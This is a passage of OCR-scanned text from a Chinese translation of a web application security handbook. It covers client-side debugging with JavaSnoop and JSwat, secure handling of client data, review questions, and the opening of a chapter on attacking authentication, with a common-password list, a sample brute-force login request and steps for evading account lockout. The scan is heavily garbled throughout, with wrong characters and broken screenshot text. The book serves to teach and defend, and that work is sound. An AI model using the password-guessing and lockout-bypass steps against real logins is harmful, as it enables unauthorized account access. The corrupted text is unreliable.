时 过 到 的 困难 。 通 第 ， 只 需要 执行 某 项 关键 功能 ， 更 改 其 行为 ， 以 消除 在 组 件 中 实施 的 控件 ， 即 
可 达到 特定 目的 。 

由 于 调度 各 在 字 节 人 码 级 别 运行 因此， 可 以 使 用 调试 絮 轻 松 控制 并 了 解 组 件 的 执行 过 程 。 具 
体 而 言 ， 如 果 可 以 通过 反 编译 获得 源 代码 ， 就 可 以 在 特定 的 代码 行 设置 断 点 ， 并 通过 观察 组 件 在 
执行 过 程 中 采用 的 代码 路 径 来 判定 通过 反 编译 获得 的 信息 是 否 正确 。 

虽然 针对 所 有 浏览 大 扩 展 拉 术 的 高 效 调 试 磊 尚 不 成 熟 ， 但 Java applet 能 够 为 调度 提供 有 效 支 
持 。JavaSnoop 是 目前 最 高 效 的 调度 融 。JavaSnoop 是 一 款 Java 调 试 禹 ， 它 能 够 与 Jad 集 成 ， 以 用 于 
反 编 详 源 代码 、 在 应 用 程序 中 跟 踩 变量 ， 并 在 方法 中 设置 断 点 来 查看 和 修改 参数 。JavaSnoop 可 
用 于 直接 “ 钩 住 ”在 浏览 套 中 运行 的 Javaapplet ( 如 图 5-6 所 示 ),， 并 可 用 于 算 改 方法 的 返回 值 ( 如 
图 5-7 所 示 )。 
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File Class Management Scripting Settings Help 
Target Program Setup 





status 
ron do EE 


机 SNOOPING 
cesspath: OOOO 


Session filename: 
Arouments， EOE ootsavedye 
vin cr EE .+ 0 


Start & Snoop 1arget Program | 





| stop snoopmg ] [ kil Program ] 





Function Hooks 





Enabled Class/Method 


Conditions 
TradeApp.getUIDO 





Enabled Parameter Operator Operand 














回 Always hook D HookIF © Don'thookTF 
On execution 


Console | Decompiled Code 
Print parameters |F|Print stacktrace 
































,to console 





[2011/01/20 14:38:53] Return value tampering request from: TradeApp.getUID{int) 








Edit return value 
加 ... to file: 


| Class: TradeApp 


Method: getUID 
FF] Run custom script 





Return value 
Edit Script,.. 


| |Tamper with parameters 





Type 


























Sent agent updated rules at 2:38:51 PM 








Accept changes and disable hook 


图 5-7 确定 适当 的 方法 后 ， 可 以 使 用 JavaSnoop 算 改 方法 的 返回 值 





注解 ”在 加 载 目标 applet 之 前 ， 最 好 首先 运行 JavaSnoop。JavaSnoop 将 取消 Java 安 全 策 
略 设置 的 限制 ， 以 便于 针对 目标 执行 操作 。 在 Windows 中 ，JavaSnoop 通 过 向 系统 中 的 


所 有 Java 程 序 授 予 各 种 权限 来 取消 限制 ， 因 此 ， 在 执行 操作 后 ， 需 要 确保 完全 关闭 
JavaSnoop 并 恢复 相关 权限 。 








JSwat 是 妃 一 个 Java 调 试 工具 , 该 工具 提供 大 量 配置 选项 。 有 时, 在 el ni ss 
日 中 ,最 好 是 反 编译 、 修 改 并 重新 编译 关键 的 类 文件 ， 然 后 使 用 JSwat 将 


其 “ 热 包 装 ” 到 正在 运 
行 的 应 用 程序 中 。 要 使 用 JSwat, 需要 使 用 JDK 中 的 appletviewer 工 具 启 动 一 个 六 applet, 然后 将 JSwat 
连接 到 该 applet。 例 如 ， 可 以 使 用 以 下 命令 : 
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appletviewer -J-Xdebug -J-Djava.compiler=NONE -J-— 
XIUNJAQwp: transport=-dt_socket, 
Server=y, Suspend=n,address=5000 appletpage.htm 


处 理 Silverlight 对 象 时 ， 可 以 使 用 Silverlight Spy 工具 监视 组 件 在 运行 时 的 执行 情况 。 在 将 相 
关 代码 路 径 关 联 到 用 户 界 面 中 的 事件 时 ， 该 工具 可 提供 很 大 的 帮助 。 下 载 Silverlight Spy 的 URL 
如 下 所 示 : 

http://firstfloorsoftware.com/SilverlightSpy/ 


5.3.6 ”本 地 客户 端 组 件 


一 些 应 用 程序 需要 在 用 户 的 计算 机 中 执行 基于 浏览 带 的 VM 沙 盒 内 无 法 执行 的 操作 。 根 据 客 
户 闪 安全 控制 ， 以 下 是 这 类 功能 的 一 些 示 例 : 
口 验证 用 户 是 否 农 有 最 新 的 病毒 扫描 带 ; 
口 验 证 代理 服务 硕 设 置 及 其 他 企业 配置 是 否 有 效 ; 
口 集成 镶 能 卡 谈 取 硕 。 
通常 ， 这些 操 作 和 需要 使 用 本 地 代码 组 件 ， 这 些 组 件 将 集成 本 地 应 用 程序 功能 和 Web 应 用 程序 
功能 。 本 地 客户 端 组 件 一 般 通 过 ActiveX 控 件 传 送 。ActiveX 控 件 是 在 浏览 带 沙 盒 以 外 运行 的 定制 
训 哆 船 扩 展 。 
由 于 没有 对 应 的 中 间 季 市 码 , 相 比 于 其 他 浏览 各 扩 展 , 解 译 本 地 客户 问 组 件 要 困难 得 多 。 但 
是 , 我 们 在 避 开 客户 端 控 件 时 采用 的 方法 对 于 本 地 客户 端 组 件 仍 然 适 用 , 不 过 ,这 时 需要 采用 一 
组 不 同 的 工具 。 以 下 是 用 于 完成 这 个 任务 的 一 些 弟 用 工具 : 
DOllyDbg 是 一 个 可 用 于 轴 历 本 地 可 执行 代码 、 设 置 断 点 ， 并 在 磁盘 上 或 在 运行 时 对 可 执行 
文件 应 用 补丁 的 Windows 调 试 厦 。 
D IDA Pro 是 一 个 反 汇编 程序 ， 它 可 以 将 大 量 平台 上 的 本 地 可 执行 代码 反 汇 编 成 人 类 可 读 的 
汇编 代码 。 
虽然 我 们 不 会 在 本 书 中 详细 介绍 有 关 逆 癌 工 程 的 信息 , 但 是 , 如 果 你 希望 详细 了 解 逆 癌 工程 
本 地 代码 组 件 及 相关 主题 ， 下 面 是 一 些 有 用 的 资源 : 
口 Reversing: Secrets of Reverse Engineering，Eldad Eilam 竺 ; 









































OD Hacker Disassembling Uncovered, Kris Kaspersky 复 ; 

口 The Art of Sofiware Security Assessment, Mark Dowd、John McDonald 和 Justin Schuh 车 ; 

口 Fuzzing for Software Security Testing and Quality Assurance (Artech House Information 
Security and Privacy), Ari Takanen、 Jared DeMott 和 Charlie Miller 和 车 ; 

DQ The IDA Pro Book: The Unofficial Guide to the Worlds Most Popular Disassembler, Chris 
Eagle 著 "” ; 


DQ www.acm.uiuc.edu/sigmil/RevEneg; 





GD 本 书 中 文 版 《IDA Pro 权 威 指南 (第 2 版 )》 已 由 人 民 邮 电 出 版 社 出 版 ， 读 者 可 登录 图 灵 社 区 (ituring.com.cn ) 本 书 
页 面 查看 相关 信息 。 编者 注 
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DQ www.uninformed.org/?2v=1&a=7。 
5.4 安全 处 理 客 户 端 数据 


如 前 所 述 ， 巾 于 客户 痪 组 件 和 用 户 输入 不 在 服务 带 的 二 接 控制 范围 内 ，Web 应 用 程序 的 核心 
安全 面临 威胁 。 客 户 端 及 其 提交 的 所 有 数据 从 本 质 上 讲 都 不 值得 信任 。 








5.4.1 通过 客 尸 端 传送 数据 
许多 应 用 程序 之 所 以 存在 缺陷 , 是 因为 它们 通过 客户 闯 以 危险 的 方式 传送 产品 价格 和 折扣 率 
之 类 的 重要 数据 。 
如 琳 可 能 ,应 用 程序 应 完全 避免 通 过 客户 端 传送 这 类 数据 。 在 几乎 任何 一 种 可 能 出 现 的 情况 
下 ， 和 都 可 以 将 这 类 数据 保存 在 服务 天 上 ， 并 在 必要 时 通过 服务 带 冰 逻辑 征 接 引用 。 例 如 ， 接 受用 
户 购买 各 种 产品 而 提 区 的 订单 的 应 用 程序 应 允许 用 户 提 交 产 品 代码 和 数量 , 并 在 服务 表 闪 数据 库 
中 碍 询 每 一 种 产品 的 价格 。 用户 疫 有 几 要 加 服务 天 提交 产品 价格 。 即 使 应 用 程序 回 不 同 的 用 户 提 
供 不 同 的 价格 或 折扣 ， 也 不 必 抛 莽 这 种 模型 。 价 格 可 按 用 户 分 类 保存 在 数据 库 中 ， 而 折扣 率 则 保 
存在 用 户 资 料 或 会 话 对 象 中 。 应 用 程序 已 经 拥有 计算 某 一 特殊 用 户 所 购买 的 某 种 产品 的 价格 所 知 
的 一 切 信息 一 一 在 不 安全 的 模型 中 , 它 必 须 ( 除非 无 法 做 到 ) 将 这 个 价格 保存 在 一 个 隐藏 的 表单 
字段 中 。 
如 采 开 发 者 认为 他 们 别 无 选择 ， 只 有 通过 客户 端 传送 重要 数据 ,那么 应 当 对 数据 进行 签名 杜 / 
或 加 密 处 理 以 防止 用 户 复 改 。 采 用 这 种 操作 还 必须 避免 两 个 重要 的 威胁 。 
口 签名 或 加 密 数据 可 能 易 受 重 传 攻击 (replay attack )。 例 如 ， 如 果 在 将 价格 保存 到 隐藏 表单 
之 前 对 其 进行 加 密 ， 攻 击 者 就 可 以 用 一 个 更 加 便宜 的 产品 的 加 密 价 格 代 蔡 最 初 的 产品 价 
格 。 为 防止 这 种 攻击 ， 应 用 程序 需要 在 加 密 数 据 中 包含 足够 的 上 下 文 ， 以 防止 攻击 者 在 
为 一 种 情况 下 重新 传送 产品 价格 。 例 如 ， 应 用 程序 可 以 将 产品 代码 和 价格 组 合 在 一 起 ， 
将 得 到 的 字符 串 单独 加 密 ， 然 后 确认 随 订 单 提 交 的 加 密 字 符 串 是 否 与 被 订购 的 闫 品 完全 
匹配 。 
口 如 采用 户 知 道 并 /或 能 够 控制 送 交 给 他 们 的 加 密 字 符 串 的 明文 值 ， 那 么 他 们 就 可 以 实施 各 
种 密码 攻击 ， 找 出 服务 融 使 用 的 加 密 密 钥 。 之 后 ， 他 们 就 能 够 用 密 钥 加 密 任 意 值 ， 完 全 
避 开 解决 方案 提供 的 保护 。 
对 于 在 ASPNET 平 台 上 和 运行 的 应 用 程序 而 言 , 建议 决 不 要 将 任何 定制 数据 以 及 任何 你 不 希望 
在 屏 妖 上 癌 用 户 显 示 的 敏感 数据 保存 在 ViewState 中 。 应 总 是 激活 用 于 局 用 ViewSstate MAC 的 
选项 。 


5.4.2 ”确认 客 尸 端 生 成 的 数据 
从 理论 上 讲 ， 客 户 端 无 法 安全 确认 由 客户 端 生成 并 且 向 服务 器 传送 的 数据 。 
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口 可 轻易 避 开 HTML 表 单字 段 和 JavaScript 之 类 的 轻 量 级 客户 端 控 件 ， 无 法 保障 服务 器 收 到 
的 输入 的 安全 性 。 

口 在 浏览 器 扩展 组 件 中 执行 的 控件 有 时 更 难以 避 开 ,但 这 种 控件 只 能 暂时 阻止 攻击 者 入 侵 。 

口 使 用 经 强化 模糊 处 理 或 压缩 的 客户 端 代 人 码 增添 了 另 一 层 障 但 ， 但 是 ， 蓄 意 攻击 者 还 是 能 
够 克服 这 些 障 碍 。( 其 他 领域 的 类 似 处 理 是 使 用 DRM 技 术 防 止 用 户 复制 数字 媒体 文件 。 许 
多 公司 在 客户 端 控 件 上 投入 大 量 资金 ， 但 每 一 种 新 型 解决 方案 通常 在 不 久 后 就 被 攻破 。) 

确认 客户 端 生成 数据 的 唯一 安全 方法 是 在 应 用 程序 的 服务 需 端 实施 保护 。 客 户 端 提 交 的 每 一 

项 数据 都 应 被 视 为 危险 和 潜在 恶意 的 。 

















© 错误 观点 ”有 了 时候， 人 们 认为 使 用 任何 客户 端 控件 必然 会 造成 不 利 影响 。 一 些 专业 渗 
透 测试 员 甚 至 把 使 用 客户 端 控件 看 作 是 一 个 “重大 发 现 ”, 并 不 检验 服务 器 是 否 使 用 这 
些 控 件 或 者 使 用 它们 是 否 出 于 非 安全 考虑 。 实 际 上 ， 尽 管 本 章 描 述 的 各 种 攻击 能 够 产 
生 严 重 的 安全 警告 ， 但 在 许多 情况 下 使 用 客户 端 控件 并 不 会 造成 任何 安全 漏洞 。 
口 客户 端 脚本 可 用 于 确认 输入 ， 以 提高 可 用 性 ， 避 免 与 服务 器 来 回 通信 。 例 如 ， 
如 果 用 户 输 入 的 出 生日 期 格式 不 正确 ， 通 过 客户 端 脚 本 向 他 们 提出 警报 可 提供 
更 加 无 颖 的 使 用 体验 。 当 然 ， 应 用 程序 必须 对 之 后 提交 给 服务 器 的 数据 进行 重 


新 确认 。 
口 有 些 时 候 ， 客 户 端 数据 确认 可 以 与 安全 措施 一 样 有 效 一 一 例如 ， 通 过 它 防 御 基 
于 DOM 的 跨 站 点 脚本 攻击 。 但 是 ,许多 时 候 攻 击 的 直接 目标 是 另 一 名 应 用 程序 
用 户 ， 而 不 是 服务 器 端 应 用 程序 。 而 且 ， 利 用 潜在 的 漏洞 不 一 定 需要 向 服务 器 
传送 任何 恶意 数据 。 请 参阅 第 12 章 和 第 13 章 了 解 有 关 这 种 情形 的 详细 内 容 。 
口 如 前 所 述 , 有 许多 方法 可 通过 客户 端 传送 加 密 数 据 ,而 不 会 语 到 破坏 或 重 传 攻击 。 





5.4.3 ”日志 与 警报 


虽然 应 用 程序 采用 长 度 限 制 和 基于 JavaScript 的 确认 之 类 的 机 制 来 提高 性 能 与 可 用 性 ,但 这 些 
机 制 应 与 服务 硕 端 入侵 检测 防御 工具 组 合 使 用 .对 客户 端 提 区 的 数据 进行 确认 的 服务 需 端 逻辑 应 认 
识 到 , 客户 端 也 采用 了 同样 的 确认 机 制 。 如 果 服 务 硕 收 到 已 被 客户 端 阻止 的 数据 , 应 用 程序 可 能 会 
据 此 推断 ， 一 名 用 户 正 设法 避 开 这 种 确认 ， 因 此 这 些 数据 可 能 是 恶 音 的。 应 用 程序 应 将 异常 记录 
到 日 志 中 ， 适 当 情 况 下 回应 用 程序 管理 员 发 出 实时 和 警报， 以便 他 们 能 够 监控 任何 攻击 企图 ， 并 在 
必要 时 采取 适当 的 行动 。 应 用 程序 还 会 主动 采取 防御 措施 ， 终 止 用 户 会 话 或 者 暂时 冻结 其 账户 。 

















注解 ”有些 时 候 ， 虽 然 用 户 的 浏览 器 共用 JavaScript， 但 他 们 仍然 能 够 使 用 采用 
JavaScript 的 应 用 程序 。 出 现 这 种 情况 ， 主 要 是 因为 浏览 器 完全 忽略 了 基于 JavaScript 


的 表单 确认 代码 ， 提交 的 是 用 户 输入 的 原始 信息 。 为 避免 错误 敬 报 ， 日 志 与 警报 机 
制 应 了 解 这 种 情况 会 在 什么 地 方 出 现 ， 会 如 何 发 生 。 
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几乎 所 有 的 客户 端 -服务 带 应 用 程序 午 必 须 接 受 这 样 一 个 事实 ， 即 客户 疹 组 件 和 其 中 发 生 的 
所 有 处 理 过 程 都 不 像 我们 期 竺 的 那样 值得 信任 。 如 前 所 述 ， 如 果 应 用 程序 使 用 “透明 的 ”通信 方 
法 , 那么 即使 经 验 尚 浅 的 攻击 者 使 用 简单 的 工具 都 能 轻易 避 开 客户 站 执行 的 大 多 数控 件 。 就 算是 
应 用 程序 对 客户 闯 数 据 和 操作 进行 模 类 处理， 蓄意 破坏 的 攻击 者 仍然 能 够 突破 这 些 防 御 。 

如 打 确 定 任何 通过 客户 闯 传 送 的 数据 , 或 确认 客户 应 正 在 执行 用 户 提交 的 输入 , 应 该 测试 服 
务 表 如 何 应 对 避 开 那些 控件 的 意外 数据 。 许 多 时 候 , 由 于 应 用 程序 认为 客户 端 执 行 的 防御 能 够 为 
其 提供 保护 ， 因 而 面临 重大 威胁 。 




















5.6 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 

(1) 通过 客户 端 传送 的 数据 如 何 阻 止 破坏 性 攻击 ? 

(2) 应 用 程序 开发 者 希望 阻止 攻击 者 对 登录 功能 发 动 蛋 力 攻 击 。 由 于 攻击 者 可 能 以 多 个 用 户 
名 为 目标 ， 开 发 者 决定 将 登录 尝试 失败 次 数 保存 在 一 个 加 密 cookie 中 ， 阻 止 任何 失败 次 数 超过 5 
次 的 请 求 。 有 什么 办 法 能 够 避 开 这 种 防御 ? 

(3) 某 一 应 用 程序 包含 一 个 执行 严格 访问 控件 的 管理 页 面 。 该 页 面 上 有 一 个 连接 到 为 一 台 
Web 服 务 硕 的 诊断 功能 链接 ， 只 有 管理 员 能 够 访问 这 些 功 能 。 不 执行 另 一 种 验证 机 制 ， 下 列 哪 一 
种 ( 如果 有 的 话 ) 客户 端 机 制 可 用 于 为 诊断 功能 提供 安全 的 访问 控件 ? 要 选择 一 个 解决 方案 ， 还 
需要 了 解 其 他 信息 吗 ? 

(a) 诊断 功能 能 够 检查 HITTP Referez 消 息 头 ， 证 实 请 求 由 主管 理 页 面 提 区 。 

(b) 诊断 功能 能 够 验证 收 到 的 cookie， 证 实 其 中 包含 访问 主 应 用 程序 所 需 的 有 效 会 话 
< 

(c) 主 应 用 程序 可 在 请 求 中 的 一 个 隐藏 字段 中 设置 一 个 验证 令 牌 。 诊 断 功 能 能 够 确认 这 一 
点 ， 证 实用 户 在 主 应 用 程序 中 有 一 个 会 话 。 

(4) 如 果 一 个 表单 字段 的 属性 为 aisabledq=true 那么 它 就 不 会 和 表单 的 其 他 内 容 一 起 提 
交 。 如 何 才能 改变 这 种 情况 呢 ? 

(5) 应 用 程序 可 采取 什么 方法 确保 客户 端 执行 了 输入 确认 ? 












































攻击 验证 机 制 








A 验证 机 制 是 Web 应 用 程序 所 有 安全 机 制 中 最 简单 的 一 种 机 制 。 通 第 ， 应 
用 程序 必须 核实 用 户 提 交 的 用 户 名 和 密码 正确 与 否 。 如 果 正 确 ， 束 允许 用 户 登 录 ， 
否则 就 荣 止 用 户 登 录 。 

验证 机 制 也 是 应 用 程序 防御 亚 意 攻击 的 中 心机 制 。 它 处 在 防御 未 授权 访问 的 最 前 治 ， 如 采用 
户 能 够 突破 那些 防御 ,他 们 通常 能 够 控制 应 用 程序 的 全 部 功能 ， 目 由 访问 其 中 保存 的 数据 。 缺 乏 
安全 稳定 的 验证 机 制 ， 其 他 核心 安全 机 制 (如 会 话 管 理 和 访问 控制 ) 都 无 法 有 效 实施 。 

设计 一 个 安全 的 验证 机 制 看 似 徊 单 ， 实 际 上 却 是 一 件 极 其 抹 烦 的 事情 。 在 现实 世界 中 ，Web 
应 用 程序 验证 机 制 通 篆 是 最 薄弱 的 环 闻 ,由 此 攻击 者 能 够 获得 未 授权 访问 。 我 们 曾 见 过 无 数 应 用 
程序 由 于 验证 机 制 存在 各 种 缺陷 而 被 攻破 的 实例 。 

本 章 将 详细 介绍 困扰 Web 应 用 程序 的 大 量 设 计 和 执行 缺陷 。 这 些 缺 陷 之 所 以 存在 ， 主 要 是 因 
为 应 用 程序 设计 者 和 开发 者 无 法 回答 一 个 简单 的 问题 : 攻击 者 针对 验证 机 制 实施 攻击 能 够 实现 什 
么 目标 ? 在 绝 大 多 数 情况 下 ， 只 要 认真 分 析 一 下 某 个 应 用 程序 ,就 可 以 发 现 许多 六 在 的 源 洞 , 其 
中 任何 一 个 都 足以 破坏 应 用 程序 。 

许多 最 笛 见 的 验证 漏洞 实际 上 极其 傈 单 。 任 何人 都 可 以 在 登录 表单 中 输入 字典 中 的 单词 ， 试 
图 猜测 有 效 的 密码 。 为 外 ， 应 用 程序 中 也 隧 着 大 一 些 细 币 的 缺陷 ， 只 有 对 复杂 的 多 阶段 登录 机 制 
进行 仔细 分 析 后 才能 发 现 它们 并 对 其 加 以 利用 。 本章 将 全 面 描述 这 些 攻击 , 包括 那些 成 功 突破 一 
些 最 安全 、 防 御 最 稳健 的 Web 应 用 程序 的 验证 机 制 的 技巧 。 


6.1 验证 近 林 


当 执 行 验证 机 制 时 ，Web 应 用 程序 开发 者 可 以 采用 各 种 不 同 的 技术 : 
口 基于 HTML 表 单 的 验证 ; 

口 多 元 机 制 ， 如 组 合 型 密码 和 物理 令 牌 ; 

口 客户 端 SSL 证 书 或 智能 卡 ; 

口 HTTP 基 本 和 摘要 验证 ; 

口 使 用 NTLM 或 Kerberos 整 合 Windows 的 验证 : 

口 验证 服务 。 
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到 目前 为 止 ，Web 应 用 程序 中 最 第 用 的 验证 机 制 是 使 用 HTML 表 单 获 取 用 户 名 和 密码 ， 并 将 
它们 提交 给 应 用 程序 。 因 特 网 上 90% 以 上 的 应 用 程序 都 采用 这 种 机 制 。 

在 更 加 注重 安全 的 因特网 应 用 程序 ( 如 电子 银行 ) 中 , 这 种 基本 的 机 制 通 常 扩 展 到 几 个 阶段 ， 
要 求 用 户 提 交 其 他 证 书 ， 如 PIN 号 人 码 或 从 机 密 字 中 选择 的 学 和 人生。HTML 表 单 仍 主 要 用 于 获取 相关 
数据 。 

最 为 注重 安全 的 应 用 程序 ( 如 为 进行 巨额 交易 的 个 人 提供 服务 的 私人 银行 ) 通常 采用 使 用 
物理 令 牌 的 多 元 机 制 。 这 些 令 牌 通 稼 产生 一 组 一 次 性 口令 ， 或 者 基于 应 用 程序 指定 的 输入 执行 
一 个 质询 - 啊 应 功能 。 随 着 这 种 技术 的 成 本 日 渐 降 低 ， 可 能 会 有 更 多 应 用 程序 采用 这 种 机 制 。 但 
是 ， 许 多 这 类 解决 方 宁 实际 上 无 法 解决 它们 则 在 解决 的 威胁 ， 主 要 是 钓鱼 攻击 和 使 用 客户 端木 
马 的 威胁 。 

一 些 Web 应 用 程序 使 用 客户 端 SSL 证 书 或 在 智能 卡 中 执行 加 密 机 制 。 但 是 ， 由 于 管理 和 分 配 
这 些 项 目的 成 本 非 党 高昂， 通常 只 有 那些 用 户 不 多 的 安全 极其 重要 的 应 用 程序 才 会 使 用 它们 。 

特 网 上 的 应 用 程序 很 少 使 用 基于 HTTP 的 验证 机 制 ( 基本、 摘要 和 整合 Windows 的 机 制 )， 
企业 内 联网 更 稼 采用 这 种 机 制 。 这 时 ,组 织 内 部 用 户 提 供 标 准 的 网 络 或 域 证 书 ,， 应 用 程序 通过 以 
上 一 种 技术 对 其 进行 处 理 ， 再 允许 用 户 访问 企业 应 用 程序 。 

一 些 应 用 程序 还 采用 Microsoft Passport 之 类 的 第 三 方 验证 服务 ,但 暂时 这 种 机 制 尚未 得 到 大 
量 使 用 。 

大 多 数 与 验证 有 关 的 漏洞 和 攻击 适用 于 上 面 提 到 的 任何 一 种 技术 。 由 于 绝 大 多 数 应 用 程序 普 
这 采用 基于 HTML 表 单 的 验证 ,我 们 将 描述 每 一 种 与 其 有 关 的 特殊 漏洞 和 攻击 ,以 及 与 其 他 可 用 
技术 有 关 的 主要 差异 和 攻击 方法 。 


6.2 验证 机 制 设计 缺陷 


与 Web 应 用 程序 常用 的 任何 其 他 安全 机 制 相 比 ， 验 证 功能 中 存在 着 更 多 设计 方面 的 薄弱 环 
节 。 即 使 在 基于 用 户 名 和 密码 验证 用 户 这 种 非常 简单 的 标准 化 模型 中 , 其 中 包含 的 设计 缺陷 也 容 
兄 导 致 应 用 程序 被 非法 访问 。 


6.2.1 ”密码 保密 性 不 强 


许多 Web 应 用 程序 没有 或 很 少 对 用 户 密 人 码 的 强度 进行 控制 。 应 用 程序 弟 第 使 用 下 列 形式 的 
密码 : 

口 非常 短 或 空 晶 的 密码 ; 

口 以 弟 用 的 字典 词汇 或 名 称 为 密码 ; 

口 密码 和 用 户 名 完全 相同 ; 

口 仍然 使 用 默认 密码 。 

图 6-1 是 一 个 实施 脆弱 密码 强度 规则 的 实例 。 通 第 ,终端 用 户 很 少 具有 安全 意识 。 因 此 ， 没 
有 实施 严格 密码 标准 的 应 用 程序 很 可 能 包含 大 量 使 用 脆弱 密码 的 用 户 账户 。 攻击 者 很 容易 就 可 猪 
测 出 这 些 和 密码， 从 而 对 应 用 程序 进行 未 授权 访问 。 
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>》FAQ - Mozilla Firefox -要 -lolx| 


File Edt Vew Go Bookmarks Tools Help 
引 ©% | 











-中 -终日 全 
< 中 
YOE UPDETCISeE TT dT Ry TOURTO WT TU UE SOCEFIECUTYVTIETTT7TOUCTESeaUcerrare UE SUTE NOT 
to include spaces or punctuation, For example; RobertSsmith, robertsmith and roberthsmith are fine; 
Bob Smith, Robert Smith or Robert H, Smith are not, 


http: tii, middleburyalumni,orgidefajlt,aspx?Page=FAQ 





Are there minimum and maximum lengths for passwords? 
The minimum password length is four characters, and the maximum length is 25 characters 
Do my PantherNet user name and password work for other alumni online services? 


Your user name and password are used for accessing the online directory, alumni lifelong e-mail 
servyices, MiddNet career networking, and alumni discussion groups. 


What if I can't remember my password? Is there a hint system for passwords? 


If you forget your password and can't log in, first a on the "Forget Your Password?" link at the 
log-on page, This will allow You to answer a password hint guestion that you set up when you 
regis stered at PantherNet， and then res et Your pas Sword, If you have forgotten both Your User 








图 6-1 一 个 实施 脆弱 密码 强度 规则 的 应 用 程序 


渗透 测试 步骤 





设法 查 明 任何 与 密码 强度 有 关 的 规则 。 

(浏览 该 Web 站 点 ， 查 找 任何 描述 上 述 规则 的 内 容 。 

(2) 如 果 可 以 进行 自我 注册 ， 用 不 同 种 类 的 脆弱 密码 注册 几 个 账户 ， 了 解 应 用 程序 采用 何 
种 规则 。 

(3) 如 果 拥 有 一 个 账户 并 且 可 以 更 改 密码 ， 试 着 把 密码 更 改 为 各 种 脆弱 密码 。 


注解 ”如 果 应 用 程序 仅 通过 客户 端 控件 实施 密码 强度 规则 ， 这 本 身 并 不 是 一 个 安全 问 
题 ， 因 为 普 ae 当 的 攻击 者 可 为 自己 分 配 脆弱 密码 ， 但 


这 通常 并 不 会 给 应 用 程序 造成 威胁 。 





尝试 访问 


http://mdsec.net/auth/217/ 


6.2.2 ” 蛮 力 攻击 登录 


登录 功能 的 公开 性 往往 诱 使 攻击 者 试图 儿 i 从 而 获得 未 授权 访问 应 用 程序 的 
权力 。 如 果 应 用 程序 允许 攻击 者 使 用 不 同 的 密码 重复 进行 登录 尝试 ,直到 找 到 正确 的 密码 ,那么 
就 非常 容易 遭受 攻击 ， he heehee legated 见 的 用 户 名 和 
We 











近 一 些 知 名 站 点 沦陷 , 成 二 上 万 个 现实 世界 中 的 密码 也 随 之 汇源 ,这 些 密 人 码 或 者 以 明文 形 
式 存 储 ， 或 者 使 用 可 普 力 攻 的 散 列 存储 。 现 实 世 界 中 的 一 些 最 常见 的 密码 如 下 所 示 ， 
DQ password 
口 网 站 名 称 
口 12345678 
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DD qwerty 
DQ abc123 
DQ 111111 
DQ monkey 
口 12345 


DD letmeln 


注解 ”管理 员 密 码 实 际 上 比 密码 策略 允许 的 更 为 脆弱 。 它 们 可 能 在 实施 密码 策略 之 前 





就 已 设置 ， 或 者 通过 其 他 应 用 程序 或 界面 设置 。 


在 这 种 情况 下 ， 精 明 的 攻击 者 会 根据 见长 的 常用 密码 列表 ,使 用 自动 技巧 尝试 猜测 出 密码 。 
依赖 今天 的 带宽 和 人 处理 能 力 , 通 过 普通 PC 和 DSL 连 接 , 攻 击 者 每 分 钟 就 可 以 发 出 数 千 个 登录 尝试 。 
这 样 ， 即 使 最 强大 的 密码 最 终 也 会 被 攻破 。 

我 们 将 在 第 14 草 详细 描述 实施 蛮 力 登录 的 各 种 自动 技巧 和 工具 。 使 用 Burp Intruder 对 一 个 账 

户 成 功 实施 密码 猜测 攻击 的 过 程 如 图 6-2 所 示 。 我 们 可 通过 HTTP 啊 应 码 、 啊 应 长 度 及 缺乏 “登录 
错误 ”消息 等 差异 清楚 区 分 成 功 的 登录 尝试 。 
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‘request | response 


params | headers | 
POST /auth/lé/Default.ashx HTTP/1.1 
Host: mdsec.net 
Content—-Type: application/x-www-form-urlencoded 
Content-Length: 34 
Connecticn: close 


username=nesahitpassword=password2 











图 6-2 ”成 功 实施 密码 猜测 的 攻击 示例 


一 些 应 用 程序 使 用 客户 端 控 件 防 止 密码 猜测 攻击 。 例 如 ， 革 个 应 用 程序 可 能 会 设置 cookie 
failedlogins=1, 如 条 登录 尝试 失败 , 递增 这 个 值 。 达到 某 个 上 限 后 , 服务 融 将 在 提交 的 cookie 
中 检测 这 个 值 ,并 拒绝 处 理 登 录 答 试 。 这 种 客户 端 防御 可 防止 仅 使 用 浏览 需 实 施 的 手动 攻击 , 但 
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如 第 $ 草 所 述 ， 这 种 防御 可 轻 匈 避 开 。 

如 条 登 录 失 败 计 数 天 保存 在 当前 会 话 中 , 这 时 就 会 出 现 前 一 个 漏洞 的 变化 形式 。 虽 然 在 客户 
疹 并 没有 表明 该 漏洞 存在 的 任何 迹象 ,但 攻击 者 只 需要 获得 一 个 全 新 的 会 话 〈 例 如 ,通过 保留 会 
话 cookie ) 即 可 继续 实施 密码 猜测 攻击 。 

最 后 ， 在 某 些 情 况 下 ， 应 用 程序 会 在 失败 的 登录 尝试 达到 一 定 次 数 后 锁定 目标 帐户。 但 是 ， 
它 会 通过 表明 (或 允许 攻击 者 推测 ) 所 提交 的 密码 是 否 正 确 的 消息 , 对 随后 的 登录 尝试 作出 啊 应 。 
这 意味 着 ， 即 使 目标 账户 被 锁定 ,攻击 者 仍然 可 以 完成 密码 猜测 攻击 。 如 果 应 用 程序 在 一 段 时 间 
后 目 动 解除 账户 的 锁定 状态 , 则 攻击 者 只 需要 等 到 这 一 时 刻 , 然后 即 可 使 用 发 现 的 密码 正常 登录 。 
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渗透 测试 步 又 


(1) 用 控制 的 茶 个 账户 手动 提交 儿 个 错误 的 登录 答 试 ， 监 控 接 收 到 的 错误 消息 。 











(2) 如 条 应 用 程序 在 大 约 10 次 登录 失败 后 还 没有 返回 任何 有 关 账 户 锁定 〈account lockout ) 
的 消息 ， 再 符 试 正确 登录 。 如 采 登 录 成 功 ， 应 用 程序 可 能 并 未 采用 任何 账户 锁定 策略 。 

(3) 如 果 账 户 被 锁定 ,可 以 尝试 重复 使 用 不 同 的 账户 。 如 果 应 用 程序 发 布 任何 cookie,， 这 次 
可 以 将 每 个 cookie 仅 用 于 一 次 登录 尝试 ， 并 为 随后 的 每 次 登录 尝试 获取 新 cookie。 

(4) 此 外 ， 如 果 账 户 被 锁定 ， 应 查看 与 提交 无 效 密码 相 比 ， 提 交 有 效 密 人 码 是 否 会 叶 致 应 用 
程序 的 行为 出 现任 何 差异 。 如 果 确 实 如 此 ， 则 可 以 继续 实施 密码 猜测 攻击 ， 即 使 账户 被 锁定 。 

(5) 如 果 没 有 控制 任何 账户 ， 尝 试 枚 举 一 个 有 效 的 用 户 名 ( 参阅 6.2.3 市 ) 并 使 用 它 提交 几 
次 错误 登录 ， 监 控 有 关 账 户 锁定 的 错误 消息 。 

